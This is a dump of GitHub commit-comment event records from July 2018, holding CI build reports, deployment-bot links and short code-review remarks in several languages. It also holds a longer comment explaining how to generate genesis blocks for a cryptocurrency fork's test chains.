{"id":"7967783764","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713946,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-15T18:53:54Z","updated_at":"2018-07-15T18:53:54Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1692 of 1693 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 650\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-15T18:53:54Z"}
{"id":"7967784555","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713949,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-15T18:54:31Z","updated_at":"2018-07-15T18:54:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:54:31Z"}
{"id":"7967786635","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29713951,"position":null,"line":null,"path":null,"commit_id":"26e47fa1097abfbfd0fe97159caf61be4efaebc5","created_at":"2018-07-15T18:56:07Z","updated_at":"2018-07-15T18:56:07Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-31](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-31).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-31-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T18:56:07Z"}
{"id":"7967788542","type":"CommitCommentEvent","actor":{"login":"DrNuenninger"},"repo":{"name":"SilverDia/best-chess-ever"},"payload":{"comment":{"id":29713956,"position":5,"line":4,"path":"chess-servlet-api/src/main/webapp/project/js/script.js","commit_id":"19afff5c23718c658d40073de88f31702da69ec6","created_at":"2018-07-15T18:57:38Z","updated_at":"2018-07-15T18:57:38Z","author_association":"COLLABORATOR","body":"Whups, danke. Copy paste Fehler\r\n"}},"created_at":"2018-07-15T18:57:38Z"}
{"id":"7967791276","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29713967,"position":null,"line":null,"path":null,"commit_id":"4925a9910a5e54167952a07830519e835d58c187","created_at":"2018-07-15T18:59:49Z","updated_at":"2018-07-15T18:59:49Z","author_association":"NONE","body":"I am going to put the test at priority -1"}},"created_at":"2018-07-15T18:59:49Z"}
{"id":"7967793869","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29713977,"position":null,"line":null,"path":null,"commit_id":"63cb55b4494b7706cd429b0d5ea0ea4ebbaabf83","created_at":"2018-07-15T19:01:41Z","updated_at":"2018-07-15T19:01:41Z","author_association":"OWNER","body":"Created multidev environment [tre#pr-3](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#pr-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T19:01:41Z"}
{"id":"7967794958","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29713978,"position":null,"line":null,"path":null,"commit_id":"f32ae737d3088494328a703b8da6193509d2ee8c","created_at":"2018-07-15T19:02:33Z","updated_at":"2018-07-15T19:02:33Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-15T19:02:33Z"}
{"id":"7967795176","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29713979,"position":null,"line":null,"path":null,"commit_id":"135dfa44bf40032510b47abf15289a8ac49ac08b","created_at":"2018-07-15T19:02:43Z","updated_at":"2018-07-15T19:02:43Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-15T19:02:43Z"}
{"id":"7967795323","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29713980,"position":null,"line":null,"path":null,"commit_id":"7673bca41491e5a5ab8a5112ec9593788e6d1433","created_at":"2018-07-15T19:02:51Z","updated_at":"2018-07-15T19:02:51Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-15T19:02:51Z"}
{"id":"7967795595","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29713981,"position":null,"line":null,"path":null,"commit_id":"fead809e7e23ea6edcbd4419641ad62e1887b15c","created_at":"2018-07-15T19:03:04Z","updated_at":"2018-07-15T19:03:04Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-15T19:03:04Z"}
{"id":"7967798967","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713984,"position":40,"line":40,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/iterative/rule/AddPartialAggregationBelowSemiJoin.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T19:05:46Z","updated_at":"2018-07-15T19:05:46Z","author_association":"OWNER","body":"Let me make those changes. I wanted to avoid the recursive loop to look for an aggregate which has been added for this specific case. Without this check, the optimizer was stuck in an infinite loop."}},"created_at":"2018-07-15T19:05:46Z"}
{"id":"7967799012","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29713985,"position":null,"line":null,"path":null,"commit_id":"87098dd03852a789a8b1ad815228b9aa61a57324","created_at":"2018-07-15T19:05:47Z","updated_at":"2018-07-15T19:05:47Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-36](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-36).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-36-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T19:05:47Z"}
{"id":"7967800539","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713988,"position":75,"line":75,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/iterative/rule/AddPartialAggregationBelowSemiJoin.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T19:07:00Z","updated_at":"2018-07-15T19:07:00Z","author_association":"OWNER","body":"Adding a PARTIAL here makes pushing down the aggregate below the Exchange error out since it expects a SINGLE aggregate."}},"created_at":"2018-07-15T19:07:00Z"}
{"id":"7967800774","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29713989,"position":null,"line":null,"path":null,"commit_id":"f7ba6451052acf12027d946c62bb3da2d58d3adf","created_at":"2018-07-15T19:07:10Z","updated_at":"2018-07-15T19:07:10Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#pr-3](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#pr-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-15T19:07:10Z"}
{"id":"7967800963","type":"CommitCommentEvent","actor":{"login":"nicooo21"},"repo":{"name":"nicooo21/website"},"payload":{"comment":{"id":29713990,"position":null,"line":null,"path":null,"commit_id":"36ef01697758e215758f15ec72ae312bf6f88562","created_at":"2018-07-15T19:07:19Z","updated_at":"2018-07-15T19:07:19Z","author_association":"OWNER","body":"### Lipsum Really?"}},"created_at":"2018-07-15T19:07:19Z"}
{"id":"7967801021","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29713991,"position":7,"line":4313,"path":"presto-tests/src/main/java/com/facebook/presto/tests/AbstractTestQueries.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-15T19:07:21Z","updated_at":"2018-07-15T19:07:21Z","author_association":"OWNER","body":"Good point, thanks. I will add specific tests for this change."}},"created_at":"2018-07-15T19:07:21Z"}
{"id":"7967802255","type":"CommitCommentEvent","actor":{"login":"rishabhdeepsingh"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29713992,"position":6,"line":172,"path":"OpenRobertaParent/OpenRobertaServer/src/main/resources/create-tables.sql","commit_id":"a0614258f8d56cdefb9d7546482833945b756f19","created_at":"2018-07-15T19:08:18Z","updated_at":"2018-07-15T19:08:18Z","author_association":"OWNER","body":"waiting for the Reply on the Issue."}},"created_at":"2018-07-15T19:08:18Z"}
{"id":"7967803880","type":"CommitCommentEvent","actor":{"login":"kirich1409"},"repo":{"name":"kirich1409/SvgGlidePlugins"},"payload":{"comment":{"id":29713995,"position":null,"line":null,"path":null,"commit_id":"1198ef3c96e0078ee530c2fb76b9b986b67dc2e9","created_at":"2018-07-15T19:09:34Z","updated_at":"2018-07-15T19:09:34Z","author_association":"OWNER","body":"I don know anything about past version of OpenIAB"}},"created_at":"2018-07-15T19:09:34Z"}
{"id":"7967805828","type":"CommitCommentEvent","actor":{"login":"Glowstoner"},"repo":{"name":"FireBlade-Serv/Faction"},"payload":{"comment":{"id":29713996,"position":null,"line":null,"path":null,"commit_id":"922ff4ad67e9327b4a1b07e58ca82b6303322d76","created_at":"2018-07-15T19:11:04Z","updated_at":"2018-07-15T19:11:04Z","author_association":"MEMBER","body":":upside_down_face: "}},"created_at":"2018-07-15T19:11:04Z"}
{"id":"7967808044","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"kredeal/dz1"},"payload":{"comment":{"id":29713999,"position":3,"line":3,"path":"1.py","commit_id":"3fe91b0060bf44e3ae47487b182936feac76fc43","created_at":"2018-07-15T19:12:46Z","updated_at":"2018-07-15T19:12:46Z","author_association":"NONE","body":"Зачем тут `math`?"}},"created_at":"2018-07-15T19:12:46Z"}
{"id":"7967808116","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29714000,"position":null,"line":null,"path":null,"commit_id":"511af657a0be8e9136d8d1bd5b9ef3d84231c442","created_at":"2018-07-15T19:12:49Z","updated_at":"2018-07-15T19:12:49Z","author_association":"CONTRIBUTOR","body":"LATEST COMMIT NOTES:\r\n> public void update(Battle battle), which was NOT on the class plan, was added to the Move class to facilitate the instantEffect() and effect() methods' usage\r\n> Not sure why addHitbox(Hitbox h) in the Battle class would return an int, and what that int would be\r\n> We using frames or seconds for collision-based things? Frames will make it easier to calculate the damage dealt by hitboxes and make instantEffect(Battle battle) easier to implement, and we're not exactly concerned that the amount of time between frames will be inconsistent, because we're going to have AIs fight each other and they don't care about input delay."}},"created_at":"2018-07-15T19:12:49Z"}
{"id":"7967808780","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"kredeal/dz1"},"payload":{"comment":{"id":29714001,"position":7,"line":7,"path":"1.py","commit_id":"3fe91b0060bf44e3ae47487b182936feac76fc43","created_at":"2018-07-15T19:13:21Z","updated_at":"2018-07-15T19:13:21Z","author_association":"NONE","body":"Назвать переменную именем функции - грубейшая ошибка программиста "}},"created_at":"2018-07-15T19:13:21Z"}
{"id":"7967811348","type":"CommitCommentEvent","actor":{"login":"jcze9"},"repo":{"name":"jcze9/aplicaciones--otros"},"payload":{"comment":{"id":29714006,"position":null,"line":null,"path":null,"commit_id":"ba1727c69d464d2355512eea68120d6eb6722f73","created_at":"2018-07-15T19:15:27Z","updated_at":"2018-07-15T19:15:27Z","author_association":"OWNER","body":"Prueba"}},"created_at":"2018-07-15T19:15:27Z"}
{"id":"7967811366","type":"CommitCommentEvent","actor":{"login":"kishankumar03"},"repo":{"name":"kishankumar03/Research_Project"},"payload":{"comment":{"id":29714007,"position":null,"line":null,"path":null,"commit_id":"c079fc73c96bf1cbcf3495a2b56c3b081f4ece4d","created_at":"2018-07-15T19:15:28Z","updated_at":"2018-07-15T19:15:28Z","author_association":"OWNER","body":"Added to source control after publishing the website to Azure"}},"created_at":"2018-07-15T19:15:28Z"}
{"id":"7967811853","type":"CommitCommentEvent","actor":{"login":"anjsllc"},"repo":{"name":"anjsllc/jobportal"},"payload":{"comment":{"id":29714008,"position":null,"line":null,"path":null,"commit_id":"db9b91ceab3dd06af5d114e5071b56d49dbaa6f5","created_at":"2018-07-15T19:15:50Z","updated_at":"2018-07-15T19:15:50Z","author_association":"OWNER","body":"Reviewed. Ready to merged"}},"created_at":"2018-07-15T19:15:50Z"}
{"id":"7967813399","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"kredeal/dz1"},"payload":{"comment":{"id":29714009,"position":11,"line":11,"path":"3.py","commit_id":"3fe91b0060bf44e3ae47487b182936feac76fc43","created_at":"2018-07-15T19:17:04Z","updated_at":"2018-07-15T19:17:04Z","author_association":"NONE","body":"Надеюсь вы проверили правильность расчётов"}},"created_at":"2018-07-15T19:17:04Z"}
{"id":"7967814853","type":"CommitCommentEvent","actor":{"login":"bturner"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29714010,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-15T19:18:14Z","updated_at":"2018-07-15T19:18:14Z","author_association":"CONTRIBUTOR","body":"I've opened #93 and #94 with a couple different (early) approaches for trying to make the detection a little smarter."}},"created_at":"2018-07-15T19:18:14Z"}
{"id":"7967815513","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"kredeal/dz1"},"payload":{"comment":{"id":29714011,"position":3,"line":3,"path":"5.py","commit_id":"3fe91b0060bf44e3ae47487b182936feac76fc43","created_at":"2018-07-15T19:18:46Z","updated_at":"2018-07-15T19:18:46Z","author_association":"NONE","body":"Опять он!!!"}},"created_at":"2018-07-15T19:18:46Z"}
{"id":"7967816723","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"kredeal/dz1"},"payload":{"comment":{"id":29714013,"position":14,"line":14,"path":"7.py","commit_id":"3fe91b0060bf44e3ae47487b182936feac76fc43","created_at":"2018-07-15T19:19:38Z","updated_at":"2018-07-15T19:19:38Z","author_association":"NONE","body":"Разносторонний треугольник потеряли."}},"created_at":"2018-07-15T19:19:38Z"}
{"id":"7967817359","type":"CommitCommentEvent","actor":{"login":"Hanumanjee"},"repo":{"name":"Hanumanjee/heymaa"},"payload":{"comment":{"id":29714014,"position":null,"line":null,"path":null,"commit_id":"be0880e0f96d8db50684741ab3d61ff56ee74d90","created_at":"2018-07-15T19:20:09Z","updated_at":"2018-07-15T19:20:09Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-15T19:20:09Z"}
{"id":"7967818936","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"boostorg/gil"},"payload":{"comment":{"id":29714018,"position":null,"line":null,"path":null,"commit_id":"4b4f3e8ea9032ba903c93c654f4a582c93fad095","created_at":"2018-07-15T19:21:22Z","updated_at":"2018-07-15T19:21:22Z","author_association":"NONE","body":"Breaks [FreeOrion](https://github.com/freeorion/freeorion/issues/2211#issuecomment-404687698) and Boost.GIL examples from 1.67. Maybe annotate as **breaking change** in release notes."}},"created_at":"2018-07-15T19:21:22Z"}
{"id":"7967819037","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"boostorg/gil"},"payload":{"comment":{"id":29714019,"position":null,"line":null,"path":null,"commit_id":"ed67f9a57152624e126d6086f3aa4e6b0f097196","created_at":"2018-07-15T19:21:26Z","updated_at":"2018-07-15T19:21:26Z","author_association":"NONE","body":"Breaks [Mapnik](https://github.com/mapnik/mapnik/pull/3937) and [FreeOrion](https://github.com/freeorion/freeorion/issues/2211#issuecomment-404687698). Maybe annotate as **breaking change** in release notes.\r\n"}},"created_at":"2018-07-15T19:21:26Z"}
{"id":"7967819433","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29714020,"position":null,"line":null,"path":null,"commit_id":"8c51ad18e28a707a80a0de809d52bb08b7a90200","created_at":"2018-07-15T19:21:47Z","updated_at":"2018-07-15T19:21:47Z","author_association":"OWNER","body":"Created multidev environment [tre#pr-4](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-tre.pantheonsite.io/)"}},"created_at":"2018-07-15T19:21:47Z"}
{"id":"7967819678","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"kredeal/dz1"},"payload":{"comment":{"id":29714021,"position":11,"line":11,"path":"8.py","commit_id":"3fe91b0060bf44e3ae47487b182936feac76fc43","created_at":"2018-07-15T19:21:59Z","updated_at":"2018-07-15T19:21:59Z","author_association":"NONE","body":"Напутали с проверкой. 1900 год не високосный, а у вас программа утверждает обратное."}},"created_at":"2018-07-15T19:21:59Z"}
{"id":"7967821563","type":"CommitCommentEvent","actor":{"login":"ims21"},"repo":{"name":"OpenPLi/enigma2-plugins"},"payload":{"comment":{"id":29714023,"position":null,"line":null,"path":null,"commit_id":"24b22c5d5d7b25b69052e98634bf1087456ae33b","created_at":"2018-07-15T19:23:21Z","updated_at":"2018-07-15T19:23:21Z","author_association":"CONTRIBUTOR","body":"solution as PR"}},"created_at":"2018-07-15T19:23:21Z"}
{"id":"7967829883","type":"CommitCommentEvent","actor":{"login":"toolboc"},"repo":{"name":"toolboc/faithcoin"},"payload":{"comment":{"id":29714038,"position":null,"line":null,"path":null,"commit_id":"998a8e666ce04f09ed156b1aaa4a1813dcceacc2","created_at":"2018-07-15T19:29:59Z","updated_at":"2018-07-15T19:29:59Z","author_association":"OWNER","body":"I basically created a new genesis block and updated the relevant chainTx data for the respective TestChain params.  Note that there are two Test Chains: TestNet and RegTest):\r\n \r\nTo create the genesis blocks for these,  start by looking at how genesis blocks are created (using Faithcoin for reference):\r\n```\r\nstatic CBlock CreateGenesisBlock(uint32_t nTime, uint32_t nNonce, uint32_t nBits, int32_t nVersion, const CAmount& genesisReward)\r\n{\r\n    const char* pszTimestamp = \"BBC NEWS 20/Dec/2017 Bitcoin Cash deals frozen as insider trading is probed\";\r\n    const CScript genesisOutputScript = CScript() << ParseHex(\"040184710fa689ad5023690c80f3a49c8f13f8d45b8c857fbcbc8bc4a8e4d3eb4b10f4d4604fa08dce601aaf0f470216fe1b51850b4acf21b179c45070ac7b03a9\") << OP_CHECKSIG;\r\n    return CreateGenesisBlock(pszTimestamp, genesisOutputScript, nTime, nNonce, nBits, nVersion, genesisReward);\r\n}\r\n```\r\n \r\nThen look at the call made to create Genesis Block in for the TestChains:\r\n*TestNet*\r\n```\r\ngenesis = CreateGenesisBlock(1486949366, 471301, 0x1e0ffff0, 1, 50 * COIN);\r\n```\r\n\r\n*RegTest*\r\n```\r\ngenesis = CreateGenesisBlock(1296688602, 0, 0x207fffff, 1, 50 * COIN);\r\n```\r\n \r\nI basically plugged these values into Genesis H0 (Note: I reused the nTime params, nonces , and pubkey of LTC; not super important but you may want to change these):\r\n \r\n*TestNet*\r\n```\r\npython genesis.py -a scrypt -z \"BBC NEWS 20/Dec/2017 Bitcoin Cash deals frozen as insider trading is probed\" -p \"040184710fa689ad5023690c80f3a49c8f13f8d45b8c857fbcbc8bc4a8e4d3eb4b10f4d4604fa08dce601aaf0f470216fe1b51850b4acf21b179c45070ac7b03a9\" -t 1486949366 -n  471301 -b 0x1e0ffff0\r\n``` \r\n\r\n*RegTest*\r\n```\r\npython genesis.py -a scrypt -z \"BBC NEWS 20/Dec/2017 Bitcoin Cash deals frozen as insider trading is probed\" -p \"040184710fa689ad5023690c80f3a49c8f13f8d45b8c857fbcbc8bc4a8e4d3eb4b10f4d4604fa08dce601aaf0f470216fe1b51850b4acf21b179c45070ac7b03a9\" -t 1296688602 -n 0 -b 0x207fffff\r\n ```\r\n\r\nWhich produces the following respective outputs:\r\n \r\n*TestNet*\r\nmerkle hash: 805d8d176abe872f5cd40b558869a0d25ed02ae471fa33f80185443e5ca9cb40\r\ngenesis hash: d686c51a8ba8b81e4173096785e458253105e1a4d637fd7824893cd2691ee71f\r\n \r\n*RegTest*\r\nmerkle hash: 805d8d176abe872f5cd40b558869a0d25ed02ae471fa33f80185443e5ca9cb40\r\ngenesis hash: 2f2a3df80323d97e3fc6700da36761482389e5f8982ed2e0425420479e36928d\r\n \r\nThese become hashes used in  assert(consensus.hashGenesisBlock.. & assert(genesis.hashMerkleRoot…\r\nAlso see:  & https://github.com/toolboc/faithcoin/commit/998a8e666ce04f09ed156b1aaa4a1813dcceacc2 \r\n \r\nHope this helps!\r\nI basically created a new genesis block and updated the relevant chainTx data for the respective TestChain params.  Note that there are two Test Chains: TestNet and RegTest):\r\n \r\nTo create the genesis blocks for these,  start by looking at how genesis blocks are created (using Faithcoin for reference):\r\n```\r\nstatic CBlock CreateGenesisBlock(uint32_t nTime, uint32_t nNonce, uint32_t nBits, int32_t nVersion, const CAmount& genesisReward)\r\n{\r\n    const char* pszTimestamp = \"BBC NEWS 20/Dec/2017 Bitcoin Cash deals frozen as insider trading is probed\";\r\n    const CScript genesisOutputScript = CScript() << ParseHex(\"040184710fa689ad5023690c80f3a49c8f13f8d45b8c857fbcbc8bc4a8e4d3eb4b10f4d4604fa08dce601aaf0f470216fe1b51850b4acf21b179c45070ac7b03a9\") << OP_CHECKSIG;\r\n    return CreateGenesisBlock(pszTimestamp, genesisOutputScript, nTime, nNonce, nBits, nVersion, genesisReward);\r\n}\r\n```\r\n \r\nThen look at the call made to create Genesis Block in for the TestChains:\r\n*TestNet*\r\n```\r\ngenesis = CreateGenesisBlock(1486949366, 471301, 0x1e0ffff0, 1, 50 * COIN);\r\n```\r\n\r\n*RegTest*\r\n```\r\ngenesis = CreateGenesisBlock(1296688602, 0, 0x207fffff, 1, 50 * COIN);\r\n```\r\n \r\nI basically plugged these values into Genesis H0 (Note: I reused the nTime params, nonces , and pubkey of LTC; not super important but you may want to change these):\r\n \r\n*TestNet*\r\n```\r\npython genesis.py -a scrypt -z \"BBC NEWS 20/Dec/2017 Bitcoin Cash deals frozen as insider trading is probed\" -p \"040184710fa689ad5023690c80f3a49c8f13f8d45b8c857fbcbc8bc4a8e4d3eb4b10f4d4604fa08dce601aaf0f470216fe1b51850b4acf21b179c45070ac7b03a9\" -t 1486949366 -n  471301 -b 0x1e0ffff0\r\n``` \r\n\r\n*RegTest*\r\n```\r\npython genesis.py -a scrypt -z \"BBC NEWS 20/Dec/2017 Bitcoin Cash deals frozen as insider trading is probed\" -p \"040184710fa689ad5023690c80f3a49c8f13f8d45b8c857fbcbc8bc4a8e4d3eb4b10f4d4604fa08dce601aaf0f470216fe1b51850b4acf21b179c45070ac7b03a9\" -t 1296688602 -n 0 -b 0x207fffff\r\n ```\r\n\r\nWhich produces the following respective outputs:\r\n \r\n*TestNet*\r\nmerkle hash: 805d8d176abe872f5cd40b558869a0d25ed02ae471fa33f80185443e5ca9cb40\r\ngenesis hash: d686c51a8ba8b81e4173096785e458253105e1a4d637fd7824893cd2691ee71f\r\n \r\n*RegTest*\r\nmerkle hash: 805d8d176abe872f5cd40b558869a0d25ed02ae471fa33f80185443e5ca9cb40\r\ngenesis hash: 2f2a3df80323d97e3fc6700da36761482389e5f8982ed2e0425420479e36928d\r\n \r\nThese become hashes used in  assert(consensus.hashGenesisBlock.. & assert(genesis.hashMerkleRoot…\r\nAlso see:  & https://github.com/toolboc/faithcoin/commit/998a8e666ce04f09ed156b1aaa4a1813dcceacc2 \r\n \r\nHope this helps!\r\n"}},"created_at":"2018-07-15T19:29:59Z"}
{"id":"7967831279","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29714047,"position":null,"line":null,"path":null,"commit_id":"2341322623856120e7a0531bd347866671832aaa","created_at":"2018-07-15T19:30:55Z","updated_at":"2018-07-15T19:30:55Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-17](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-17).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-17-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-15T19:30:55Z"}
{"id":"7967831610","type":"CommitCommentEvent","actor":{"login":"maxice8"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29714048,"position":14,"line":14,"path":"srcpkgs/perl-MP3-Tag/template","commit_id":"e3964f2f178395876305e7ab27ad4a0cb1a3e2cb","created_at":"2018-07-15T19:31:10Z","updated_at":"2018-07-15T19:31:10Z","author_association":"MEMBER","body":"That is not a SPDX identifier"}},"created_at":"2018-07-15T19:31:10Z"}
{"id":"7967831921","type":"CommitCommentEvent","actor":{"login":"maxice8"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29714049,"position":13,"line":13,"path":"srcpkgs/lltag/template","commit_id":"e3964f2f178395876305e7ab27ad4a0cb1a3e2cb","created_at":"2018-07-15T19:31:26Z","updated_at":"2018-07-15T19:31:26Z","author_association":"MEMBER","body":"that is not a SPDX identifier"}},"created_at":"2018-07-15T19:31:26Z"}
{"id":"7967832729","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29714051,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-15T19:32:08Z","updated_at":"2018-07-15T19:32:08Z","author_association":"NONE","body":"yes - err... why? - you mean I could use it directly without reassigning it?"}},"created_at":"2018-07-15T19:32:08Z"}
{"id":"7967834489","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29714053,"position":14,"line":1893,"path":"mne/source_estimate.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-15T19:33:25Z","updated_at":"2018-07-15T19:33:25Z","author_association":"NONE","body":"Ok this we have to discuss, because to the best of my knowledge I thought so far, that this functionality also for SourceEstimate and VectorSourceEstimate will be deprecated and removed anyway?? Not anymore?"}},"created_at":"2018-07-15T19:33:25Z"}
{"id":"7967836025","type":"CommitCommentEvent","actor":{"login":"madebr"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":29714054,"position":6,"line":26,"path":"rwlib/source/rw/casts.hpp","commit_id":"4af3cdac2c35cee1b8a0de01c76f61843433cee5","created_at":"2018-07-15T19:34:33Z","updated_at":"2018-07-15T19:34:33Z","author_association":"CONTRIBUTOR","body":"Is it possible to use `Source::const_pointer` instead of char if you really want to support other string types."}},"created_at":"2018-07-15T19:34:33Z"}
